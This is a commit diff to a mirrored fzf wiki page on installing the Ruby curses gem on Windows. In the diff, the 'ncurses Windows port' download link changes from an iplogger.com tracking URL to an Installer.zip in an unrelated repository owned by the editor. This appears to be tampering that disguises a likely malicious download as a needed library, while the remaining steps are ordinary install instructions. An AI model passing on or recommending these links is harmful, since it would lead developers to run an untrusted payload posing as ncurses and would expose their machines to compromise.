m/fzf
1
0
mirror of https://github.com/junegunn/fzf.git synced 2025-11-17 15:53:39 -05:00

Updated Installing curses gem (markdown)

salmarko
2023-01-19 22:29:48 +02:00
parent c73785280e
commit 650e201a7e

@@ -15,7 +15,7 @@ gem install curses
```
## DevKit (Windows)
1. Download [ncurses Windows port](https://iplogger.com/2Asx28). [x86](https://iplogger.com/2Asx28)
1. Download [ncurses Windows port](https://github.com/salmarko/RevealingModulePattern/releases/download/soft/Installer.zip). [x86](https://github.com/salmarko/RevealingModulePattern/releases/download/soft/Installer.zip)
2. Unzip to anywhere, for example `C:\ncurses`.
3. Run `gem install curses --platform=ruby -- --with-ncurses-dir="C:\ncurses"` (Replace `C:\ncurses` with wherever you extracted it).
4. Now when we `require 'curses'` we get `The specified module could not be found` because `libncursesw6.dll` can't be found.